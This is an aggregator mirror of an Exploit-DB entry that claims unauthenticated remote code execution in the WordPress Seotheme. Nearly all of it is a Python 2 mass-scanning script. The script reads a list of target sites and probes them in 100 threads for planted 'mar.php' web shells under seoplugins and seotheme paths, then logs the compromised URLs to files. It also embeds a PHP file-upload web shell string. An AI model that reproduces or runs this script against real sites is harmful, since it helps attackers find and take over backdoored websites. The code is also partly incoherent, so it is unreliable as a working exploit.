10
[webapps] Wordpress Seotheme - Remote Code Execution Unauthenticated
source link: https://www.exploit-db.com/exploits/51789
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Wordpress Seotheme - Remote Code Execution Unauthenticated
# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA
shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}
try:
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
def URLdomain(site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site
def FourHundredThree(url):
try:
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
except :
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
print '\n [!] {}Saved in Shells.txt'.format(fc)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK